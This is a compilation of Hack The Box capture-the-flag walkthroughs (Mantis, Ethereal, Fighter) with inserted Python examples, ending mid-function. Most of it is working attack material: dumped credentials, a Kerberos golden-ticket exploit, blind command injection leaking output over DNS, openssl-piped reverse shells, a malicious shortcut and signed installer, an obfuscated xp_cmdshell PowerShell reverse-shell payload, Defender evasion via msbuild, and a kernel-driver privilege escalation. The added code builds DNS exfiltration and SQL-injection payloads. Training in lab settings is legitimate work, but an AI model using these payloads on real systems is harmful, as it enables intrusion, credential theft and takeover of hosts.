Copyright (c) Microsoft Corporation
Express Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1) (Hypervisor)
SQL> SELECT name FROM master..sysdatabases
master 
tempdb 
model 
msdb 
orcharddb 
SQL> use orcharddb
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: orcharddb
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'orcharddb'.
SQL> SELECT COLUMN_NAME 'All_Columns' FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='blog_Orchard_Users_UserPartRecord '
Id 
UserName 
Email 
NormalizedUserName 
Password 
PasswordFormat 
HashAlgorithm 
PasswordSalt 
RegistrationStatus 
EmailStatus 
EmailChallengeToken 
CreatedUtc 
LastLoginUtc 
LastLogoutUtc 
SQL> select UserName,Password from blog_Orchard_Users_UserPartRecord
admin 
AL1337E2D6YHm0iIysVzG8LA76OozgMSlyOJk1Ov5WCGK+lgKY6vrQuswfWHKZn2+A== 
James 
J@m3s_P@ssW0rd! 
SQL>

Before this we had added the target IP with the names htb.local and mantis.htb.local, found through nmap, to our local hosts file (/etc/hosts), and installed impacket from GitHub:

git clone https://github.com/CoreSecurity/impacket.git

Impacket ships goldenPac.py, which exploits MS14-068 (the Kerberos PAC validation flaw) to obtain a ticket with domain-admin rights for an ordinary domain user and then executes commands over SMB in psexec style. With James's password from the database this gives a SYSTEM shell on the domain controller straight away:

root@kali:~/htb/mantis# goldenPac.py htb.local/james@mantis.htb.local
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

Password: J@m3s_P@ssW0rd!
[*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
[*] Forest SID: S-1-5-21-4220043660-4019079961-2895681657
[*] Attacking domain controller mantis.htb.local
[*] mantis.htb.local found vulnerable!
[*] Requesting shares on mantis.htb.local.....
[*] Found writable share ADMIN$
[*] Uploading file wGWklYmG.exe
[*] Opening SVCManager on mantis.htb.local.....
[*] Creating service AgUh on mantis.htb.local.....
[*] Starting service AgUh.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

c:\Users\james\Desktop>type user.txt
8a8*****54d

c:\Users\Administrator\Desktop>type root.txt
209*****567

Author: Jacco Straathof

HTB – Ethereal

Today we are going to solve another CTF challenge, "Ethereal". It is a retired vulnerable lab presented by Hack the Box to help pentesters practise online penetration testing according to their experience level; they have a collection of vulnerable labs as challenges, from beginner to expert level.

Level: Insane

Task: To find user.txt and root.txt file

Note: Since these labs are available online they have static IPs. The IP of Ethereal is 10.10.10.106.

Walkthrough

Let’s start off with scanning the network to find our target.

root@kali:~/htb/ethereal# nmap -sC -sV -oA nmap 10.10.10.106
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-02 13:49 EDT
Nmap scan report for ethereal.htb (10.10.10.106)
Host is up (0.11s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV IP 172.16.249.135 is not the same as 10.10.10.106
| ftp-syst: 
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 10.0
| http-methods: 
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ethereal
8080/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=ethereal.htb
| http-server-header: 
| Microsoft-HTTPAPI/2.0
|_ Microsoft-IIS/10.0
|_http-title: 401 - Unauthorized: Access is denied due to invalid credentials.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.80 seconds

1. Anonymous FTP login is allowed, and the share contains FDISK.zip. Switch the transfer mode to binary before downloading, otherwise the archive is often corrupted on the way. wget can mirror the whole tree in one go; the server needs active mode, as the PASV address mismatch in the nmap output shows:

root@kali:~/htb/ethereal# wget --no-passive-ftp -m ftp://anonymous:anonymous@10.10.10.106

[Image: FTP server]

2. Unzip FDISK.zip to get a disk image. The file command identifies it as a FAT filesystem; mount it with mount -t vfat /root/FDISK /mnt/htbdisk and extract the two files pbox.dat and pbox.exe. Running pbox.exe in a Windows XP virtual machine fails: it is a 16-bit application and cannot be started directly.

[Image: Pbox.exe]

3. A 16-bit DOS emulator is easy to find; DOSBox is the best known (plenty of old arcade games such as Prince of Persia run in it). The first attempt to run pbox in it hangs.

4. This is probably a compatibility issue. Fortunately DOSBox is also packaged for Kali (apt-get install dosbox), but because pbox needs DOS protected mode it may report an error like "no DPMI - Get csdpmi*b.zip". The fix, described at https://www.linuxtopia.org/online_books/linux_tool_guides/the_sed_faq/sedfaq5_004.html, is to download CWSDPMI.EXE and drop it into the directory with pbox.exe; after that pbox.exe runs normally.

5. The password is "password". Once past it, pbox is a small password database: clicking through the table entries yields a list of usernames and passwords. The combination that turns out to be valid is:

user: alan
password: !C414m17y57r1k3s4g41n!

[Image: Pbox database]

6. These credentials log us in on port 8080. Behind the login is a "Test Connection" page with a "Ping Address" field, which immediately suggests OS command injection.

[Image: port 8080 login]

7. The injection is blind, so the problem is how to see command output. On Linux one would use ping -p to carry data in the payload, but the Windows ping has no -p option, so nslookup is the tool instead: a cmd for /f loop splits each line of the command output into tokens and hands a token to nslookup as the name to resolve against our host, and the names arrive as DNS queries on our side. For example, to see the second column of netstat -ano (local address and port), the command injected into the web form is:

127.0.0.1 | for /f "tokens=2" %I in ('netstat -ano') do nslookup %I 10.10.8.20

(For the for /f loop syntax see https://www.youtube.com/watch?v=jMS6LkMdAHI.)
Several tokens can be joined into one name: to get columns 1 to 6 of a file, use tokens=1,2,3,4,5,6 with the matching placeholders %a.%b.%c.%d.%e.%f:

127.0.0.1 | for /f "tokens=1,2,3,4,5,6" %a in ('type c:\xxxxx.txt') do nslookup %a.%b.%c.%d.%e.%f 10.10.8.8

After submitting the injection, run tcpdump or Wireshark on our side with a dns filter to read the echoed data. (The capture below came from running tasklist; because the lookups fail, nslookup sends each query twice, so every result is repeated.)

[Image: Wireshark capture results]

8. Next, enumerate the firewall rules. netsh advfirewall firewall show rule name=all lists the Windows firewall configuration, but its output cannot be pushed through the injection point directly, so we need a writable directory to dump it to a file and then read the file back with type. C:\users\public is normally the lowest-privilege writable path, but writing there fails. Enumerating directory permissions with icacls shows that our user alan can write to C:\users\public\desktop\Shortcuts\, and reading the dumped configuration from there reveals that, apart from DNS, ICMP and the web ports already in use, only TCP ports 73 and 136 are allowed through.

Piping netsh advfirewall firewall show rule name=all straight into nslookup always crashed the page, so instead the relevant lines are redirected into a file:

127.0.0.1 & netsh advfirewall firewall show rule name=all|findstr "Rule Name:"|findstr "Allow" > C:\users\public\desktop\shortcuts\firewall.rulename.allow

This writes firewall.rulename.allow into a subfolder of Public that Ethereal\Alan has write access to. Now we read the file back with the nslookup loop, which sends us the rule names:

127.0.0.1 & for /f "tokens=1,2,3,4,5,6,7,8" %a in ('type c:\users\public\desktop\shortcuts\firewall.rulename.allow') do nslookup %a.%b.%c.%d.%e.%f.%g.%h 10.10.14.20

The result, as seen by Responder's DNS listener on our side:

root@kali:~/htb/ethereal# responder -I tun0
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.20]
Challenge set [random]
Don't Respond To Names ['ISATAP']

[+] Listening for events...
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.ICMP.Reply
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.ICMP.Request
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.UDP.Port.53
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.TCP.Ports.73.136
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.Port.80.8080
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.ICMP.Request
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.ICMP.Reply

9. Keep looking around the system with dir. Eventually OpenSSL 1.1.0 turns up under C:\Program Files (x86); we will use it to build a shell. A command that exfiltrates a complete dir listing, one entry per query:

127.0.0.1 & cmd.exe /V /C "for /f " delims= " %e in ('DIR /B C:\') do cmd /c nslookup -querytype=A %e.a.a 10.10.14.20"
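The nslookup loop in step 7 and the directory listing above both push raw output tokens into DNS names, which drops characters that are not valid in a label, truncates long entries and doubles results on retries. The following Python, an added example that is not part of the write-up, models the robust form of the same channel on the collecting side: encode_lines() defines the name layout a sender has to produce (hex labels, sequence and part numbers, within the 63-byte label and 253-byte name limits) and decode_queries() rebuilds the lines from whatever query names the listener recorded. DOMAIN, the sample lines and the noise query are constructed for the example.

```python
"""Reliable DNS exfiltration for blind command injection (encoder and decoder).

Added example, not code from the write-up. The for /f + nslookup trick
ships raw output tokens as DNS names, so anything that is not a valid
label character is lost, long lines break the 63-byte label and 253-byte
name limits, and nslookup's retries produce duplicate queries. This models
the robust version of the same channel: encode_lines() turns each output
line into one or more query names (s<seq>.p<part>.n<total>.<hex labels>.DOMAIN)
and decode_queries() rebuilds the lines from the names the listener
(tcpdump, Responder, a DNS server log) recorded, tolerating duplicates,
reordering and unrelated queries. DOMAIN and the sample lines are
constructed for this example; a target-side sender has to produce the
same name layout.
"""
from __future__ import annotations
import re

DOMAIN = "exfil.attacker.example"   # assumed collector domain
MAX_LABEL = 63                       # RFC 1035 label limit
MAX_NAME = 253                       # RFC 1035 name limit (text form)
_OVERHEAD = len("s9999999.p9999.n9999.") + len(DOMAIN)
LABELS_PER_NAME = max(1, (MAX_NAME - _OVERHEAD) // (MAX_LABEL + 1))

QUERY_RE = re.compile(r"^s(\d+)\.p(\d+)\.n(\d+)\.((?:[0-9a-f]{1,63}\.)*)"
                      + re.escape(DOMAIN) + r"\.?$")


def encode_lines(lines) -> list[str]:
    """Hex-encode each line and split it into DNS names that respect the size limits."""
    names = []
    for seq, line in enumerate(lines):
        hexdata = line.encode("utf-8").hex()          # only [0-9a-f]: always label-safe
        labels = [hexdata[i:i + MAX_LABEL] for i in range(0, len(hexdata), MAX_LABEL)]
        groups = [labels[i:i + LABELS_PER_NAME]
                  for i in range(0, len(labels), LABELS_PER_NAME)] or [[]]  # empty line -> one empty part
        for part, group in enumerate(groups):
            names.append(".".join([f"s{seq}", f"p{part}", f"n{len(groups)}", *group, DOMAIN]))
    return names


def decode_queries(names) -> list[str]:
    """Rebuild the original lines from observed query names (any order, duplicates allowed)."""
    parts, totals = {}, {}
    for name in names:
        m = QUERY_RE.match(name.strip().lower())      # DNS is case-insensitive (0x20 randomisation)
        if not m:
            continue                                   # unrelated traffic
        seq, part, total, hexlabels = int(m[1]), int(m[2]), int(m[3]), m[4]
        totals[seq] = total
        parts.setdefault(seq, {})[part] = hexlabels.replace(".", "")   # a retry hits the same key
    lines = []
    for seq in sorted(parts):
        got = parts[seq]
        if len(got) != totals[seq]:
            lines.append(f"<seq {seq}: {len(got)}/{totals[seq]} parts received>")
            continue
        lines.append(bytes.fromhex("".join(got[p] for p in sorted(got))).decode("utf-8", "replace"))
    return lines


if __name__ == "__main__":
    # Constructed sample output, resembling what netstat -ano and the firewall dump produce.
    sample = ["TCP    0.0.0.0:8080    0.0.0.0:0    LISTENING    4",
              "Rule Name: Allow TCP Ports 73 136", ""]
    queries = encode_lines(sample)
    observed = [queries[1], queries[0], queries[0], "wpad.htb.local", queries[2]]  # retry, reorder, noise
    for line in decode_queries(observed):
        print(repr(line))
```

On the target the same layout can be produced with a short PowerShell one-liner rather than cmd's for /f, but anything that hex-encodes and sequences the chunks will do: the decoder does not care how the names were generated, only that they match the layout. Feed it the query names from tcpdump -n port 53, Responder's log, or your DNS server's query log.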

10. I was not familiar with using openssl in a client/server arrangement, so I first built a test setup locally. The command options are documented at https://www.openssl.org, which only provides source code; Windows installers for each version are available at http://slproweb.com/products/Win32OpenSSL.html (installation is just clicking Next).

[Image: OpenSSL for Windows]

11. On the Kali side, set up the openssl server. It needs a private key and a certificate, so run:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
The certificate fields it then asks for (country code, e-mail address and so on) can be filled in freely as long as the format is valid. The command parameters are explained in the IBM documentation:
https://www.ibm.com/support/knowledgecenter/en/SSWHYP_4.0.0/com.ibm.apimgmt.cmc.doc/task_apionprem_gernerate_self_signed_openSSL.html

[Image: generating the certificate]

12. Testing openssl s_client against that server locally shows that it behaves like nc without the -e option: whatever is typed is shown on the other side, but nothing is executed. The fix is to use pipes: one s_client connection feeds the standard input of cmd.exe, and the standard output of cmd.exe is piped into a second s_client connection. In short:

openssl s_client 1 ----> input | cmd.exe | openssl s_client 2 ----> output

This is why two allowed ports were needed from the firewall rules. Translated into the command injected on the web side:

127.0.0.1 & START "" cmd /c "C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.20:73 | cmd.exe |C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.20:136"
On the attacking side, run two terminals at the same time, one openssl server on port 73 and another on port 136:

openssl s_server -quiet -key key.pem -cert cert.pem -port 73
openssl s_server -quiet -key key.pem -cert cert.pem -port 136

Type a command in the port 73 terminal and press Enter, then submit the injection above on the web side so the input is pushed through the pipe, and read the result in the port 136 terminal.

13. With a low-privileged shell, the next clue is in c:\users\alan\Desktop: a note telling us there is a Visual Studio shortcut on the Public Desktop that we should make use of.

[Image: clue file]

14. Create a malicious .lnk shortcut with PowerShell (on our own Windows machine), pointing it at cmd.exe with the same openssl pipe as its arguments:

PS C:\Users\jacco> $WScript = New-Object -ComObject 'wscript.shell'
PS C:\Users\jacco> $SC = $WScript.CreateShortcut('Puckie.lnk')
PS C:\Users\jacco> $SC

FullName : C:\Users\jacco\Puckie.lnk
Arguments :
Description :
Hotkey :
IconLocation : ,0
RelativePath :
TargetPath :
WindowStyle : 1
WorkingDirectory :

PS C:\Users\jacco> $SC.TargetPath="C:\windows\system32\cmd.exe"
PS C:\Users\jacco> $SC.Arguments="/c c:\progra~2\openssl-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.20:73 | cmd | c:\progra~2\openssl-v1.1.0/bin\openssl.exe s_client -connect 10.10.14.20:136"
PS C:\Users\jacco> $SC

FullName : C:\Users\jacco\Puckie.lnk
Arguments : /c c:\progra~2\openssl-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.20:73 | cmd | c:\progra~2\openssl-v1.1.0/bin\openssl.exe s_client -connect 10.10.14.20:136
Description :
Hotkey :
IconLocation : ,0
RelativePath :
TargetPath : C:\Windows\System32\cmd.exe
WindowStyle : 1
WorkingDirectory :

PS C:\Users\jacco> $SC.Save()
PS C:\Users\jacco> dir C:\users\jacco\*.lnk

Directory: C:\users\jacco

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/4/2019 7:39 PM 1219 Puckie.lnk

The resulting shortcut shows the command to be executed in its Target field.

15. Upload the shortcut and overwrite c:\users\public\desktop\shortcuts\Visual Studio 2017.lnk. Uploading a .lnk directly may fail, so rename it to .txt for the transfer and rename it back afterwards. The upload reuses the openssl pipe, but the existing shell connection must be closed first.

On Kali: openssl s_server -quiet -key key.pem -cert cert.pem -port 73 < malicious.txt
On the web side: 10.10.14.20|C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.20:73 > c:\users\public\desktop\shortcuts\out.txt (rename the file from .txt to .lnk once the upload succeeds)
Then re-establish the shell and, in it, swap the shortcut:
del "c:\users\public\desktop\shortcuts\Visual Studio 2017.lnk" & copy "c:\users\public\desktop\shortcuts\out.lnk" "c:\users\public\desktop\shortcuts\Visual Studio 2017.lnk"

16. Soon a new shell comes in, this time as user jorge. In this shell we no longer depend on the web form: commands go in on port 73 and results come out on port 136, which is a lot smoother. user.txt is on jorge's desktop.

[Image: user.txt]

17. Keep searching. There are two suspicious folders on the D: drive: Certs, which contains a certificate and its private key, and DEV, which holds another clue file. The clue is easy to read: if a malicious MSI package is placed in that path, the user rupal will come along and install it, and together with the certificate files this most likely means the MSI has to be signed.

[Image: clue file 2]

18. Typing the certificate files prints binary garbage that cannot be copied, and we do not have a download channel yet, so use openssl's base64 encoder to print them as text:
C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe base64 -in MyCA.cer
C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe base64 -in MyCA.pvk
Copy the base64 text to Kali and restore the files with base64 -d.

[Image: obtaining the certificate]

19. To generate the MSI we use the graphical EMCO MSI Package Builder. Create a new project, open Custom Actions, right-click to add a new Pre/Post Action, fill in the key parameters and build the MSI package (the password field is left blank).

Malicious msi generation

20. Sign the MSI with the downloaded certificate. This needs .NET Framework 4 and the Windows SDK, available at:
.NET Framework 4: https://www.microsoft.com/en-us/download/details.aspx?id=17851
winsdk: https://www.microsoft.com/en-us/download/confirmation.aspx?id=8279
Once installed, signing goes as follows: makecert issues a new code-signing certificate (hack.cer/hack.pvk) chained to the stolen CA, pvk2pfx bundles it into a PFX, and signtool signs the MSI with it:
makecert -n "CN=Ethereal" -pe -cy end -ic C:\MyCA.cer -iv C:\MyCA.pvk -sky signature -sv C:\hack.pvk C:\hack.cer
pvk2pfx -pvk C:\hack.pvk -spc C:\hack.cer -pfx C:\hack.pfx
signtool sign /f C:\hack.pfx C:\shell.msi
If the signature succeeds, you see the following:

Successful signature

21. Upload the signed MSI to d:\dev\msis\shell.msi, then close the two openssl connections on ports 73 and 136 and start listening on them again. After about a minute the rupal user's shell comes in, and root.txt can be read from that user's Desktop.

1cb6f1fc220e3f2fcc0e3cd8e2d9906f

22. If the MSI does not run the first time, a second attempt needs a freshly generated and signed MSI: once installed, a package is registered by Windows Installer and the same package will not be run again. It shows up under Add/Remove Programs in Control Panel, but in this environment there is no way to uninstall the package installed earlier.

Author : Jacco Straathof

HTB – Fighter

Today we are going to solve another CTF challenge, "Fighter". It is a retired vulnerable lab presented by Hack the Box for helping pentesters perform online penetration testing according to their experience level; they have a collection of vulnerable labs as challenges, from beginner to expert level.

Level: Intermediate

Task: To find user.txt and root.txt file

Note: Since these labs are online available therefore they have a static IP. The IP of Fighter is 10.10.10.72

Let’s start off with our basic nmap command to find out the open ports and services.

C:\Users\jacco>nmap -sC -sV -T4 10.10.10.72
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-24 09:46 W. Europe Summer Time
Nmap scan report for streetfighterclub.htb (10.10.10.72)
Host is up (0.029s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: StreetFighter Club
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.67 seconds

The Nmap output shows us that there is only 1 port open: 80(HTTP)

We find that port 80 is running http, so we open the IP in our browser.

In the homepage, we find the Domain name “streetfighterclub.htb”. We add the domain to our /etc/hosts file.

Nothing else stands out on the page, but a site using a .htb hostname may serve additional virtual hosts, so we brute-force subdomains. We intercept the request in Burp, send it to Intruder, and mark the subdomain portion of the Host header as the payload position.

As the wordlist we use namelist.txt from /usr/share/dnsrecon/.

The brute force turns up a subdomain, members.streetfighterclub.htb, that answers with HTTP 403.

We add the subdomain in /etc/hosts so that we can access the web site.

We open the webpage and got a 403 Forbidden error.

We now run a dirb scan against members.streetfighterclub.htb and find a directory called "old".

dirb http://members.streetfighterclub.htb/

Since the server is IIS, we scan that directory for .asp files and find a page called login.asp.

dirb http://members.streetfighterclub.htb/old -X .asp

We open the web page and find a login page.

The login form turns out to be vulnerable to SQL injection. Dumping the database gives us usernames, passwords and e-mail addresses, but none of them let us log in, so we use the injection for command execution instead: the backend is MSSQL, which executes stacked queries, so we append statements to the logintype parameter that enable xp_cmdshell through sp_configure and run a PowerShell reverse shell. This only works because the application's database login has the rights to change server configuration (sp_configure needs ALTER SETTINGS, i.e. the sysadmin or serveradmin role). We referred to this link.

POST /old/verify.asp HTTP/1.1
Host: members.streetfighterclub.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: nl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://members.streetfighterclub.htb/old/Login.asp
Content-Type: application/x-www-form-urlencoded
Content-Length: 944
Connection: close
Cookie: ASPSESSIONIDACRSQCAA=PDDFFGAADNIIKGMMCKGJFIPB; Email=; Level=%2D1; Chk=1821; password=YWRtaW4%3D; username=YWRtaW4%3D
Upgrade-Insecure-Requests: 1

username=admin&password=admin&logintype=1%3bEXEC+sp_configure+'show+advanced+options',+1%3bRECONFIGURE+WITH+OVERRIDE%3bEXEC+sp_configure+'xp_cmdshell',+1%3bRECONFIGURE+WITH+OVERRIDE%3bdrop+table+fighter%3bcreate+table+fighter+(out+varchar(8000))%3binsert+into+fighter+(out)+execute+Xp_cMdsHelL+'C%3a\WIndOWs\sySwOw64\WINdOwspOweRshEll\v1.0\poWersHeLl.Exe+"$clIEnT+%3d+NEw-ObJect+SYstEm.nEt.SOckEts.TcPclIeNt(\"10.10.14.20\",80)%3b$stReAm+%3d+$clIEnT.GetsTrEam()%3b[byte[]]$bYtEs+%3d+0..65535|%25{0}%3bwHIle(($i+%3d+$stReAm.Read($bYtEs,+0,+$bYtEs.LEnGth))+-ne+0){%3b$dAta+%3d+(NEW-oBjecT+-TypeNAme+SYsTem.tExt.ASCIiENcoDing).GEtstRInG($bYtEs,0,+$i)%3b$sEndback+%3d+(iEX+$data+2>%261+|+OUt-stRing+)%3b$Sendback2+%3d+$sEndback+%2b+\"sH3lL+\"+%2b+(pWd).PAth+%2b+\"^>+\"%3b$senDbyte+%3d+([texT.eNCodIng]%3a%3aAScIi).GEtByTes($Sendback2)%3b$stReAm.WRite($senDbyte,0,$senDbyte.Length)%3b$stReAm.FLuSh()}%3b$clIEnT.CloSe()"'%3b&rememberme=ON&B1=Login
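The request above is worth unpacking. logintype is passed into an MSSQL query, and MSSQL executes stacked statements, so everything after the 1; runs as additional statements: sp_configure turns on advanced options and then xp_cmdshell, RECONFIGURE WITH OVERRIDE applies both, and the output of the executed command is captured in a throwaway table. The mixed case in Xp_cMdsHelL exists only to slip past naive filters. The following Python is an added example and not part of the write-up: one function builds such a payload for an arbitrary command, another URL-decodes a captured request body and flags the indicators, which a WAF or log rule has to do after decoding and case-insensitively. The sample body is the page's own request, abbreviated, with the PowerShell one-liner replaced by '...'.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qs, quote_plus

# Added example, not part of the write-up: build the stacked-query payload the
# request above carries, and detect it in a captured request body.


def xp_cmdshell_payload(command: str, table: str = "fighter") -> str:
    """Return a value for the injectable 'logintype' field.

    MSSQL executes stacked statements, so after the legitimate value '1' we
    switch on advanced options, switch on xp_cmdshell, apply both, and capture
    the command's output in a table a later injection can read back.
    """
    safe_cmd = command.replace("'", "''")  # escape quotes inside the T-SQL string literal
    statements = [
        "1",
        "EXEC sp_configure 'show advanced options', 1",
        "RECONFIGURE WITH OVERRIDE",
        "EXEC sp_configure 'xp_cmdshell', 1",
        "RECONFIGURE WITH OVERRIDE",
        f"drop table {table}",
        f"create table {table} (out varchar(8000))",
        f"insert into {table} (out) execute xp_cmdshell '{safe_cmd}'",
    ]
    return ";".join(statements) + ";"


def build_body(username: str, password: str, command: str) -> str:
    """Form-encode the POST body the way the browser request above was encoded."""
    fields = {
        "username": username,
        "password": password,
        "logintype": xp_cmdshell_payload(command),
        "rememberme": "ON",
        "B1": "Login",
    }
    return "&".join(f"{name}={quote_plus(value)}" for name, value in fields.items())


def decode_body(body: str) -> Dict[str, List[str]]:
    """URL-decode an application/x-www-form-urlencoded body into field -> values."""
    return parse_qs(body, keep_blank_values=True)


# Detection side. Match after decoding and case-insensitively: the mixed case in
# 'Xp_cMdsHelL' and the %-encoding only defeat filters that look at the raw body.
INDICATORS = {
    "stacked_query": re.compile(r";\s*(exec|execute|drop|create|insert)\b", re.I),
    "enable_xp_cmdshell": re.compile(r"sp_configure\s*'?\s*xp_cmdshell\s*'?\s*,\s*1", re.I),
    "xp_cmdshell_call": re.compile(r"\bxp_cmdshell\b", re.I),
    "powershell": re.compile(r"powershell(\.exe)?", re.I),
}


def analyse_body(body: str) -> Dict[str, List[str]]:
    """Return {field: [indicator names]} for each form field that trips an indicator."""
    findings: Dict[str, List[str]] = {}
    for field, values in decode_body(body).items():
        for value in values:
            hits = [name for name, rx in INDICATORS.items() if rx.search(value)]
            if hits:
                findings.setdefault(field, []).extend(hits)
    return findings


# Constructed sample: the write-up's request body, abbreviated. The PowerShell
# one-liner handed to xp_cmdshell is replaced by '...'.
CAPTURED_BODY = (
    "username=admin&password=admin&logintype=1%3bEXEC+sp_configure+'show+advanced+options',+1"
    "%3bRECONFIGURE+WITH+OVERRIDE%3bEXEC+sp_configure+'xp_cmdshell',+1%3bRECONFIGURE+WITH+OVERRIDE"
    "%3bdrop+table+fighter%3bcreate+table+fighter+(out+varchar(8000))%3binsert+into+fighter+(out)"
    "+execute+Xp_cMdsHelL+'C%3a\\WIndOWs\\sySwOw64\\WINdOwspOweRshEll\\v1.0\\poWersHeLl.Exe+...'"
    "%3b&rememberme=ON&B1=Login"
)


if __name__ == "__main__":
    print(build_body("admin", "admin", "whoami"))
    print(analyse_body(CAPTURED_BODY))
```

The detector keys on the combination (a stacked statement plus an sp_configure that enables xp_cmdshell), which is far more specific than alerting on every semicolon in a form field; the same regexes run unchanged over IIS or proxy logs that record POST bodies.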

 

We set up our listener and got a reverse shell.

C:\Users\jacco>nc -lvp 80
listening on [any] 80 ...
connect to [10.10.14.20] from streetfighterclub.htb [10.10.10.72] 49440
whoami
fighter\sqlserv

Nothing useful turns up on the target, so we try to upgrade the shell to Meterpreter, but any .exe we drop is blocked: the machine runs Windows Defender (see the Empire section below). We found a reference for the bypass through this link. The idea is to avoid dropping an executable at all and have a trusted, already-present binary run the payload: nps_payload (https://github.com/trustedsec/nps_payload) generates an MSBuild project XML that carries a Meterpreter stager, and msbuild.exe executes it.

We move into c:\users\sqlserv, the home directory of the user our shell runs as.

On Kali we start the listener with the resource script that nps_payload generates alongside the XML.

msfconsole -r msbuild_nps.rc

We start our python HTTP Server to send our file to the target machine.

python -m SimpleHTTPServer 80

We download the file using certutil.exe on the target machine.

certutil.exe -urlcache -split -f http://10.10.14.3/msbuild_nps.xml msbuild_nps.xml

We then run the XML file we uploaded using msbuild.exe.

As soon as we run the file we get a meterpreter session. As we can see by running sysinfo we have a 32-bit meterpreter session on a 64-bit machine.

To convert it into 64-bit session, we check the processes and find the 64-bit running process. We then migrate our process to a 64-bit process and get a 64-bit session.

meterpreter > ps
meterpreter > migrate 2320

Nothing else turns up for privilege escalation. Since the box is themed on Street Fighter, we search for Street Fighter exploits and find that Street Fighter V shipped a kernel driver, Capcom.sys, with a privilege-escalation vulnerability (the driver lets user-mode code run in the kernel). So we check whether the Capcom service exists on the target.

sc query capcom

We find the Metasploit module for it (exploit/windows/local/capcom_sys_exec), but running it fails with an error that the system is not vulnerable: the module's check rejects the target's Windows version even though the driver is present. We comment out the OS version check in the module and run it again.

Now we are successfully able to run the exploit.

msf > use exploit/windows/local/capcom_sys_exec
msf exploit(windows/local/capcom_sys_exec) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(windows/local/capcom_sys_exec) > set lhost tun0
msf exploit(windows/local/capcom_sys_exec) > set lport 80
msf exploit(windows/local/capcom_sys_exec) > set session 2
msf exploit(windows/local/capcom_sys_exec)> run

Running getuid in the new session shows that we now have administrative rights.

Enumerating the directories, we find user.txt in c:\users\decoder\Desktop; its contents are the first flag.

In c:\users\Administrator\Desktop there is a file called root.exe, which asks for a password when run, and next to it a DLL called checkdll.dll, which presumably performs the password check.

We download both the files into our system using meterpreter.

download root.exe /root/Desktop
download checkdll.dll /root/Desktop

We reverse engineer both files in IDA and find that the check XORs each character of the string variable aFmFeholH with 9. The string itself is Fm`fEhOl}h (note the backtick, which is easily lost when the string is copied out of the disassembler).

So we create a C program that XORs 9 with each character of Fm`fEhOl}h.

We compile and run it and get the password: OdioLaFeta.

When we provide the password to the root.exe we get our final flag.
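The same check, written out in Python as an added example rather than the write-up's own C program: the stored string is Fm`fEhOl}h, the value that XOR 9 maps to the password reported above (the backtick is a character that tends to vanish when the string is copied or rendered as text). The block also shows what a single-byte XOR is worth as protection by recovering the key without knowing it.

```python
from typing import List, Tuple

# Added example, not the write-up's own C program: the password check in
# root.exe/checkdll.dll as the write-up describes it (each byte XORed with 9),
# and why that obfuscation is trivially reversible.

KEY = 0x09

# The string stored in the binary. Note the backtick: 0x60 == ord('i') ^ 9.
OBFUSCATED = "Fm`fEhOl}h"


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a one-byte key; applying it twice gives the input back."""
    return bytes(b ^ key for b in data)


def recover_password(obfuscated: str = OBFUSCATED, key: int = KEY) -> str:
    """What the write-up's C program does: undo the XOR to get the cleartext."""
    return xor_bytes(obfuscated.encode("ascii"), key).decode("ascii")


def check_password(candidate: str, obfuscated: str = OBFUSCATED, key: int = KEY) -> bool:
    """The check as a program would implement it: XOR the input, compare with the stored blob."""
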